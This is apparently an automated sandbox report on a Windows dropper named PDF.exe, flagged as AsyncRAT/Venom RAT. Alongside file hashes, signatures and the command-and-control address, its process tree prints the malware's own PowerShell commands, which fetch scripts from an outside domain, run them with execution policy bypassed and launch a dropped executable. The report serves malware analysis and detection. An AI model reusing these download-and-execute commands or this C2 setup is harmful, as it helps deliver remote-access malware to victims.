Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
21/01/2025, 13:31
250121-qspexswjes 1021/01/2025, 12:04
250121-n8tngasrhm 1013/07/2024, 12:59
240713-p8a2ss1gpq 10Analysis
-
max time kernel
134s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
13/07/2024, 12:59
Static task
static1
Behavioral task
behavioral1
Sample
PDF.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
PDF.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
PDF.exe
Resource
win10v2004-20240709-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Extracted
http://thelustfactory.com/vns/winrar.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
54.153.17.157:14445
rpujporiumcisxsdyop
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000b00000001ac57-134.dat family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 2 3988 powershell.exe 3 3988 powershell.exe 5 484 powershell.exe 6 484 powershell.exe 7 5080 powershell.exe 8 5080 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1900 winrar.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral2/files/0x000700000001ac55-144.dat pdf_with_link_action -
pid Process 3988 powershell.exe 484 powershell.exe 1296 powershell.exe 5080 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1780 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 484 powershell.exe 484 powershell.exe 484 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 5080 powershell.exe 5080 powershell.exe 5080 powershell.exe 1900 winrar.exe 1900 winrar.exe 1900 winrar.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 3988 powershell.exe Token: SeDebugPrivilege 484 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeIncreaseQuotaPrivilege 1296 powershell.exe Token: SeSecurityPrivilege 1296 powershell.exe Token: SeTakeOwnershipPrivilege 1296 powershell.exe Token: SeLoadDriverPrivilege 1296 powershell.exe Token: SeSystemProfilePrivilege 1296 powershell.exe Token: SeSystemtimePrivilege 1296 powershell.exe Token: SeProfSingleProcessPrivilege 1296 powershell.exe Token: SeIncBasePriorityPrivilege 1296 powershell.exe Token: SeCreatePagefilePrivilege 1296 powershell.exe Token: SeBackupPrivilege 1296 powershell.exe Token: SeRestorePrivilege 1296 powershell.exe Token: SeShutdownPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeSystemEnvironmentPrivilege 1296 powershell.exe Token: SeRemoteShutdownPrivilege 1296 powershell.exe Token: SeUndockPrivilege 1296 powershell.exe Token: SeManageVolumePrivilege 1296 powershell.exe Token: 33 1296 powershell.exe Token: 34 1296 powershell.exe Token: 35 1296 powershell.exe Token: 36 1296 powershell.exe Token: SeIncreaseQuotaPrivilege 1296 powershell.exe Token: SeSecurityPrivilege 1296 powershell.exe Token: SeTakeOwnershipPrivilege 1296 powershell.exe Token: SeLoadDriverPrivilege 1296 powershell.exe Token: SeSystemProfilePrivilege 1296 powershell.exe Token: SeSystemtimePrivilege 1296 powershell.exe Token: SeProfSingleProcessPrivilege 1296 powershell.exe Token: SeIncBasePriorityPrivilege 1296 powershell.exe Token: SeCreatePagefilePrivilege 1296 powershell.exe Token: SeBackupPrivilege 1296 powershell.exe Token: SeRestorePrivilege 1296 powershell.exe Token: SeShutdownPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeSystemEnvironmentPrivilege 1296 powershell.exe Token: SeRemoteShutdownPrivilege 1296 powershell.exe Token: SeUndockPrivilege 1296 powershell.exe Token: SeManageVolumePrivilege 1296 powershell.exe Token: 33 1296 powershell.exe Token: 34 1296 powershell.exe Token: 35 1296 powershell.exe Token: 36 1296 powershell.exe Token: SeDebugPrivilege 5080 powershell.exe Token: SeDebugPrivilege 1900 winrar.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1760 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1900 winrar.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe 1760 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 524 wrote to memory of 4780 524 PDF.exe 73 PID 524 wrote to memory of 4780 524 PDF.exe 73 PID 4780 wrote to memory of 3988 4780 cmd.exe 75 PID 4780 wrote to memory of 3988 4780 cmd.exe 75 PID 4780 wrote to memory of 484 4780 cmd.exe 76 PID 4780 wrote to memory of 484 4780 cmd.exe 76 PID 4780 wrote to memory of 1296 4780 cmd.exe 77 PID 4780 wrote to memory of 1296 4780 cmd.exe 77 PID 4780 wrote to memory of 5080 4780 cmd.exe 79 PID 4780 wrote to memory of 5080 4780 cmd.exe 79 PID 5080 wrote to memory of 1900 5080 powershell.exe 80 PID 5080 wrote to memory of 1900 5080 powershell.exe 80 PID 4780 wrote to memory of 1780 4780 cmd.exe 81 PID 4780 wrote to memory of 1780 4780 cmd.exe 81 PID 4780 wrote to memory of 1760 4780 cmd.exe 83 PID 4780 wrote to memory of 1760 4780 cmd.exe 83 PID 4780 wrote to memory of 1760 4780 cmd.exe 83 PID 1760 wrote to memory of 800 1760 AcroRd32.exe 85 PID 1760 wrote to memory of 800 1760 AcroRd32.exe 85 PID 1760 wrote to memory of 800 1760 AcroRd32.exe 85 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 952 800 RdrCEF.exe 86 PID 800 wrote to memory of 4632 800 RdrCEF.exe 87 PID 800 wrote to memory of 4632 800 RdrCEF.exe 87 PID 800 wrote to memory of 4632 800 RdrCEF.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exe"C:\Users\Admin\AppData\Local\Temp\PDF.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\69A7.tmp\69A8.tmp\69A9.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Admin\AppData\Roaming\winrar.exe"C:\Users\Admin\AppData\Roaming\winrar.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1900
-
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:1780
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7AD456181D8FC2FFDEC1DD97520C0B83 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:952
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=44FAF06498A96CABB645B45747DB214C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=44FAF06498A96CABB645B45747DB214C --renderer-client-id=2 --mojo-platform-channel-handle=1640 --allow-no-sandbox-job /prefetch:15⤵PID:4632
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7F3E92CCE6DDD5280B539E4C5E0ADF37 --mojo-platform-channel-handle=2244 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2916
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BA7D9D0A680B97A748BC89318645D5DD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BA7D9D0A680B97A748BC89318645D5DD --renderer-client-id=5 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job /prefetch:15⤵PID:1188
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9C23A54666E4A31B9BC59BA6C3F964E2 --mojo-platform-channel-handle=2576 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2900
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3CD357F5B5EB004043C4E9973A6713B2 --mojo-platform-channel-handle=2708 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:404
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD54279064b1491009ae88e80fa09ac43c1
SHA16609b50c0637915fcd0d627313d1d687e725fd49
SHA2563ac8d46a2d4904d43773d9f911f1af3606ccbe9808f4da1f21fb71a9836a100d
SHA51235ce3bcec15e34a95dce667ebd715eee2deebb1ac55ebc665b9d4854f887c4df7581a20fd194a8a56fded787d659dea582a22b71545b49274969bc713c9fc974
-
Filesize
3KB
MD542d4b1d78e6e092af15c7aef34e5cf45
SHA16cf9d0e674430680f67260194d3185667a2bb77b
SHA256c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
Filesize
1KB
MD5fb09ef8ca31f7f29fbf8afb9ace246b0
SHA1e65aa69aa5ae26e3a460f531ccfb553b15684a4c
SHA2562d288fcd775b43b1d5741af64732946d0836f3b4de234b5c3fe33a687a10f084
SHA512ea1cfd051260416b4e0a9a3ebfe130b020c82d8dda568141a96c536437ee87e846207d10ac8f3946f74043add167d5b7f331e2cbdb32031e93da9dd387b9a31f
-
Filesize
1KB
MD53d5c7766d5424e579193f0ca22fde27b
SHA154ab646e58329d161b8443fc5c0d095b3f34b750
SHA256d9be31385765c19207c2f45f4d8b36649557da6b46e700d68dbc9341ce3bd1aa
SHA51200a062d8fe650506051c9b0beaf2a467a07218a00e088c7c185fa39d6039047ade071deaa3cc97bcf643b54f946a48017adf96e088363290090085144c8dea1f
-
Filesize
1KB
MD5b8f379d84644f5a186969ca1cface6e4
SHA167cf9be73fc4a0f5ab3846b46f723b9fab5c2ef7
SHA256c4235ede5857c58f8740219df65184efaa18ec42ecc32c694d58a6ea3961a020
SHA51292adbc758beaef7e93add2501a796a7808f0f06e3a5bd2a2e24b347d41b76e16d1bd959248a7a3dbc8152f1ab6e5110632b3423e8b17b176d50925906b6d118f
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
292B
MD5c45d77f74bf20916eea08e12286d999c
SHA109db885179d853b5a3c1a55acc7cb805d579a2a2
SHA2563fe1c7a75ff9897ee9d4489221e4b6f15632104a8b044bfd77b61d530ba6959b
SHA51229fe904f21d59900b3191554b54da236a2213f1e33a424931346b772bb15a28bf1dec7bcd5641e2637da0cf358ad8fc492ed6dff133f3d53600dc27e1c5d5fd4
-
Filesize
276B
MD5d7ca2ab9bdffd0dc3f8027df9412cbb0
SHA16928881786e0090321783f1bb9d77816336522a5
SHA256f029b124f899b34b0229f1a74a7e46b51b9853c73399a9eb922a13459c79b027
SHA512959c9c4881692eec74e9cca401acad934c16026a0e9102d0abb54ce85703bfae3023abfb68ee70a3ced032aeb124a976efa7fbd0818be61333f0b568f8ccf12e
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288
-
Filesize
78KB
MD59e75fe5e60c15dd6b76e075516968cc3
SHA1fdb181a276c5d02ebc87fe302a4a61feddbeab59
SHA25658cd06e6011f7ce13d7ea4f7a2476c1bae3d3250b704d34030dc11818b7f403a
SHA51268b32885cc715ba8f8c0d3deda2174ebc6f02bc7113bd61ad6b8ef9b8349bf5290882a674ad5322b3a512b409d128e4d5e3a909d4311434d932296579c832cba